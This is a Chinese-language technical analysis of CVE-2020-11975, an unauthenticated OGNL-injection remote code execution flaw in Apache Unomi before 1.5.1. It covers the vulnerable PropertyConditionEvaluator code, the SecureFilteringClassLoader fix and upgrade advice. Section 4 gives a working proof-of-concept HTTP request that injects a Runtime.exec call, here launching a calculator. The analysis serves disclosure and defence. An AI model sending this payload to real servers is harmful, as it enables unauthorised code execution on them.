Apache Unomi RCE漏洞分析(CVE-2020-11975)：OGNL注入漏洞详解<\/h1>

1. Apache Unomi概述<\/h2>

Apache Unomi是一个Java开源客户数据平台，主要用途包括：<\/p>

在各种系统(CMS、CRM、问题跟踪系统、移动应用等)中整合个性化功能<\/li>
提供配置文件管理功能<\/li>

2019年成为Apache顶级项目，具有高度可扩展性和易用性<\/li> <\/ul>

2. 漏洞基本信息<\/h2>
漏洞编号<\/strong>：CVE-2020-11975
漏洞类型<\/strong>：OGNL注入导致的远程代码执行(RCE)
影响版本<\/strong>：Apache Unomi < 1.5.1
触发前提<\/strong>：无需身份验证，能访问到服务即可利用
漏洞发现者<\/strong>：Yiming Xiang of NSFOCUS<\/p>

3. 漏洞原理分析<\/h2>
3.1 漏洞背景<\/h3>
Unomi提供了：<\/p>

受限API(需要授权)用于数据操作<\/li>
公开endpoint用于上传和检索用户数据<\/li> <\/ol>
Unomi允许在这些endpoint的HTTP请求中包含复杂的conditions(条件)，这些条件依赖于表达式语言(如OGNL或MVEL)来构造复杂查询。<\/p>
3.2 漏洞根源<\/h3>
在1.5.1之前的版本中，表达式语言(OGNL\/MVEL)完全不受限制，导致可以通过EL注入实现RCE。<\/p>
关键问题代码位于：
plugins\/baseplugin\/src\/main\/java\/org\/apache\/unomi\/plugins\/baseplugin\/conditions\/PropertyConditionEvaluator.java<\/code><\/p>
public<\/span> class<\/span> PropertyConditionEvaluator<\/span> implements<\/span> ConditionEvaluator {<\/span> <\/span><\/span> protected<\/span> Object getOGNLPropertyValue<\/span>(<\/span>Item item,<\/span> String expression)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ExpressionAccessor accessor =<\/span> getPropertyAccessor(<\/span>item,<\/span> expression);<\/span> <\/span><\/span> return<\/span> accessor !=<\/span> null<\/span> ?<\/span> accessor.<\/span>get<\/span>(<\/span>getOgnlContext(),<\/span> item)<\/span> :<\/span> null<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>3.3 漏洞触发流程<\/h3> Unomi接收包含恶意OGNL表达式的JSON请求<\/li> 系统首先尝试查找硬编码属性<\/li> 若未找到，则调用getOGNLPropertyValue<\/code>方法<\/li> 该方法将用户输入的属性名作为OGNL表达式直接执行<\/li> ExpressionAccessor<\/code>使用默认参数执行OGNL表达式，导致任意代码执行<\/li> <\/ol> 4. 漏洞利用(PoC)<\/h2> 4.1 攻击示例<\/h3> POST<\/span> \/context.json HTTP<\/span>\/<\/span>1.1<\/span> <\/span><\/span>Host:<\/span> localhost:8181<\/span> <\/span><\/span>Connection:<\/span> close<\/span> <\/span><\/span>Content-Length:<\/span> 749<\/span> <\/span><\/span> <\/span><\/span>{ <\/span><\/span> "personalizations": [{ <\/span><\/span> "id": "gender-test_anystr", <\/span><\/span> "strategy": "matching-first", <\/span><\/span> "strategyOptions": { <\/span><\/span> "fallback": "var2" <\/span><\/span> }, <\/span><\/span> "contents": [{ <\/span><\/span> "filters": [{ <\/span><\/span> "condition": { <\/span><\/span> "parameterValues": { <\/span><\/span> "propertyName": "(#r=@java.lang.Runtime@getRuntime()).(#r.exec(\"\/System\/Applications\/Calculator.app\/Contents\/MacOS\/Calculator\"))", <\/span><\/span> "comparisonOperator": "equals_anystr", <\/span><\/span> "propertyValue": "male_anystr" <\/span><\/span> }, <\/span><\/span> "type": "profilePropertyCondition" <\/span><\/span> } <\/span><\/span> }] <\/span><\/span> }] <\/span><\/span> }], <\/span><\/span> "sessionId": "test-demo-session-id" <\/span><\/span>} <\/span><\/span><\/code><\/pre>4.2 攻击效果<\/h3> 成功执行系统命令(如打开计算器)，响应返回200 OK。<\/p> 5. 漏洞修复分析<\/h2> 5.1 修复方案<\/h3> 主要修复措施是引入SecureFilteringClassLoader<\/code>限制OGNL和MVEL表达式的执行。<\/p> 5.1.1 OGNL修复代码<\/h4> protected<\/span> Object getOGNLPropertyValue<\/span>(<\/span>Item item,<\/span> String expression)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ClassLoader secureFilteringClassLoader =<\/span> new<\/span> SecureFilteringClassLoader(<\/span>PropertyConditionEvaluator.<\/span>class<\/span>.<\/span>getClassLoader<\/span>());<\/span> <\/span><\/span> OgnlContext ognlContext =<\/span> getOgnlContext(<\/span>secureFilteringClassLoader);<\/span> <\/span><\/span> ExpressionAccessor accessor =<\/span> getPropertyAccessor(<\/span>item,<\/span> expression,<\/span> ognlContext,<\/span> secureFilteringClassLoader);<\/span> <\/span><\/span> return<\/span> accessor !=<\/span> null<\/span> ?<\/span> accessor.<\/span>get<\/span>(<\/span>ognlContext,<\/span> item)<\/span> :<\/span> null<\/span>;<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.1.2 MVEL修复代码<\/h4> private<\/span> static<\/span> Object executeScript<\/span>(<\/span>Map<<\/span>String,<\/span> Object><\/span> context,<\/span> String script)<\/span> {<\/span> <\/span><\/span> final<\/span> ClassLoader tccl =<\/span> Thread.<\/span>currentThread<\/span>().<\/span>getContextClassLoader<\/span>();<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> if<\/span> (!<\/span>mvelExpressions.<\/span>containsKey<\/span>(<\/span>script))<\/span> {<\/span> <\/span><\/span> ClassLoader secureFilteringClassLoader =<\/span> new<\/span> SecureFilteringClassLoader(<\/span>ConditionContextHelper.<\/span>class<\/span>.<\/span>getClassLoader<\/span>());<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>setContextClassLoader<\/span>(<\/span>secureFilteringClassLoader);<\/span> <\/span><\/span> ParserConfiguration parserConfiguration =<\/span> new<\/span> ParserConfiguration();<\/span> <\/span><\/span> parserConfiguration.<\/span>setClassLoader<\/span>(<\/span>secureFilteringClassLoader);<\/span> <\/span><\/span> mvelExpressions.<\/span>put<\/span>(<\/span>script,<\/span> MVEL.<\/span>compileExpression<\/span>(<\/span>script,<\/span> new<\/span> ParserContext(<\/span>parserConfiguration)));<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> MVEL.<\/span>executeExpression<\/span>(<\/span>mvelExpressions.<\/span>get<\/span>(<\/span>script),<\/span> context);<\/span> <\/span><\/span> }<\/span> finally<\/span> {<\/span> <\/span><\/span> Thread.<\/span>currentThread<\/span>().<\/span>setContextClassLoader<\/span>(<\/span>tccl);<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.2 SecureFilteringClassLoader实现<\/h3> @Override<\/span> <\/span><\/span>public<\/span> Class<?><\/span> loadClass(<\/span>String name)<\/span> throws<\/span> ClassNotFoundException {<\/span> <\/span><\/span> if<\/span> (<\/span>forbiddenClasses !=<\/span> null<\/span> &&<\/span> classNameMatches(<\/span>forbiddenClasses,<\/span> name))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> ClassNotFoundException(<\/span>"Access to class "<\/span> +<\/span> name +<\/span> " not allowed"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> if<\/span> (<\/span>allowedClasses !=<\/span> null<\/span> &&<\/span> !<\/span>classNameMatches(<\/span>allowedClasses,<\/span> name))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> ClassNotFoundException(<\/span>"Access to class "<\/span> +<\/span> name +<\/span> " not allowed"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> return<\/span> delegate.<\/span>loadClass<\/span>(<\/span>name);<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>5.3 修复效果<\/h3> 对于OGNL表达式：<\/p> 使用@<\/code>符号静态访问对象类时会调用loadClass()<\/code><\/li> 如java.lang.Runtime.getRuntime()<\/code>会被SecureFilteringClassLoader<\/code>拦截<\/li> <\/ul> <\/li> 对于MVEL表达式：<\/p> 使用new<\/code>创建对象时会调用loadClass()<\/code><\/li> 只能创建来自allowlist的类实例<\/li> 注意：未限制使用已存在的对象<\/li> <\/ul> <\/li> <\/ol> 6. 漏洞总结<\/h2> CVE-2020-11975是OGNL注入漏洞，可导致无需认证的RCE<\/li> 修复方案通过SecureFilteringClassLoader<\/code>限制危险类加载<\/li> 修复同时考虑了OGNL和MVEL表达式<\/li> 该修复不完全，后续被发现存在绕过(CVE-2020-13942)<\/li> <\/ol> 7. 安全建议<\/h2> 升级到Apache Unomi 1.5.1或更高版本<\/li> 实施网络访问控制，限制Unomi服务的访问范围<\/li> 监控异常请求，特别是包含OGNL\/MVEL表达式的请求<\/li> 定期进行安全审计和漏洞扫描<\/li> <\/ol>